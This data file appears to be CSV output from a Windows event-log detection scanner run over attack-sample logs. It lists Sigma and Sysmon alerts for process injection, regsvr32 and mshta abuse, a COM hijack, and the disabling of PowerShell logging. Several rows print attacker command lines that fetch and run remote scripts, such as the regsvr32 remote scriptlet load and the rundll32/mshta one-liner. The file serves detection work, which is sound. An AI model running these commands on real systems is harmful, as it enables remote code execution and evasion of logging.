+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:18.833 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:18.833 +09:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,../hayabusa-rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:50:36.889 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
+2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
+2019-05-20 03:05:07.719 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
+2019-05-20 03:05:33.454 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
+2019-05-21 09:35:07.308 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.463 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.463 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.518 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.870 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.279 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:10.161 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 365ABB72-47BE-5CE3-0000-0010CF0C3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:12.705 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
